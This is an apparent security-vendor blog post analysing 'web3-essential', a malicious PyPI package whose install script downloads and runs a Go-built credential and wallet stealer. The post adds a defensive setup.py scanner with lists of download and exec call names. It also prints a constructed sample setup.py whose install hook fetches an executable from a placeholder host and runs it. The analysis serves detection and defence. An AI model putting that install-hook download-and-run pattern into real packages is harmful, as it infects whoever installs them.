FortiGuard Labs Threat Research

Supply Chain Attack by New Malicious Python Package, “web3-essential”

By Jin Lee | February 02, 2023

The FortiGuard Labs team has discovered another new 0-day attack in a PyPI (Python Package Index) package called “web3-essential”. We found it on January 30, 2023, while monitoring the open-source ecosystem. The package was published on January 26, 2023, the same day its author, ‘Trexon’, joined the repository. Because this pattern of joining and publishing on the same day recurs so often, it is wise to take extra precautions before downloading packages published by newly joined authors.

The author included a brief description of the project along with a unique version number, ‘1.0.4b0’, apparently in an attempt to avoid suspicion.

Figure 1: Package author information

Figure 2: Project description

Figure 3: Package release history


The package includes malicious code in its installation script that downloads an executable file and runs it as part of the installation.

Figure 4: script
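As an added defensive check (not code from this report or from the package itself), the following scanner parses a setup.py and flags the install-time download-and-execute pattern described above: a call that fetches remote content, a call that launches a process, and a subclass of the setuptools install command, which is what runs code during `pip install`. The embedded sample setup.py is constructed for illustration with a placeholder URL; it is not the package's real script.

```python
import ast

# Install-time call names of interest: remote fetches, process launches, and the
# setuptools install command whose subclasses run arbitrary code during `pip install`.
DOWNLOAD_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"os.system", "os.startfile", "os.popen", "subprocess.run", "subprocess.call", "subprocess.Popen"}
INSTALL_HOOK = "setuptools.command.install.install"

def resolve(node, aliases):
    # Flatten `a.b.c` into "a.b.c", expanding the leftmost name through import aliases.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))

def scan_setup_py(source):
    tree = ast.parse(source)
    aliases = {}  # locally bound name -> fully qualified origin
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:  # `import urllib.request` binds `urllib`; `import os as o` binds `o`
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:  # `from os import system as s` binds `s` -> "os.system"
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    f = {"downloads": [], "execs": [], "custom_install": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = resolve(node.func, aliases)
            if name in DOWNLOAD_CALLS:
                f["downloads"].append(name)
            elif name in EXEC_CALLS:
                f["execs"].append(name)
        elif isinstance(node, ast.ClassDef) and any(resolve(b, aliases) == INSTALL_HOOK for b in node.bases):
            f["custom_install"] = True
    # Download plus execution in one setup script is the pattern this report describes.
    f["verdict"] = "suspicious" if f["downloads"] and f["execs"] else "clean"
    return f

# Constructed sample modelled on the behaviour described above; not the real package's code.
SAMPLE_SETUP_PY = '''from setuptools import setup
from setuptools.command.install import install
import os, urllib.request
class PostInstall(install):
    def run(self):
        urllib.request.urlretrieve("https://malware.example.invalid/ily.exe", "ily.exe")
        os.startfile("ily.exe")
setup(name="web3-essential", version="1.0.4b0", cmdclass={"install": PostInstall})
'''
```

Running `scan_setup_py(SAMPLE_SETUP_PY)` reports the urlretrieve download, the os.startfile launch, the custom install hook, and a "suspicious" verdict; a setup.py that only calls `setup()` comes back "clean".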

The interesting element is the download URL, which warrants deeper analysis:


As shown in the VirusTotal entry below, the download URL serves the following binary executable (SHA-256):


While only one vendor detects this download URL, several vendors do flag the downloaded executable file as malicious.


Figure 5: According to VirusTotal, this URL is only detected by one vendor

Figure 6: Vendors that detect the downloaded executable ily.exe


The downloaded executable seems to be a Go-compiled executable file. Let’s try running it.

Figure 7: ily.exe running

One suspicious behavior of ‘ily.exe’ is that it creates DB files in the ‘%USER%\AppData\Local\cloudflare-warp-cache\raw\’ folder. These may be used to record sensitive user data and credentials.

Figure 8: Created DB files

Let’s take a look at the DB files below. We can safely assume they will be used to save sensitive data and credentials, such as credit card and login information.

Figure 9: edge_login_data

Figure 10: edge_web_data

When we examine the binary in IDA, we see many strings that raise suspicion and give clues about the malware’s behavior. Keywords of interest include ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’.

Figure 11a: Snippets of suspicious strings from IDA

Below we can also see strings ending in ‘.zip’ for several browser names, which could indicate that the stolen information is saved as a zip file.

Figure 11b: Snippet of strings from IDA

The code snippet below lists the browsers that the malware takes an interest in.

Figure 12: Snippet of IDA code of the browsers the malware takes an interest in

We also found an interesting URL embedded in the code:


It uses the Go package ‘dishooks’, a Discord webhook API wrapper. From the URL, it appears to be related to the “Spidey Bot” malware, which is known to steal personal information through Discord.


Figure 13: Snippet of IDA code for webhook

Figure 14: Webhook URL string

Figure 15: Content of the URL


In this blog, we saw a new author upload a malicious package on the same day they joined. The package contained a very simple Python script that downloads a malicious binary executable designed to steal sensitive information such as credit card and login data.

In our previous blogs on malicious PyPI packages, we have observed that malware authors commonly behave this way. We have also seen that these malicious executables are frequently built with a variety of toolchains, such as the Go compiler or PyInstaller.

Fortinet Protections

Python Package Index administrators have confirmed that after notification by FortiGuard Labs, this package has been taken down.

FortiGuard AntiVirus detects the malicious executables identified in this report as

ily.exe: W64/Stealer.679E!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.

If you think you’ve been impacted by this or any other cybersecurity threat, reach out to our Global FortiGuard Incident Response Team.




Malicious URLs

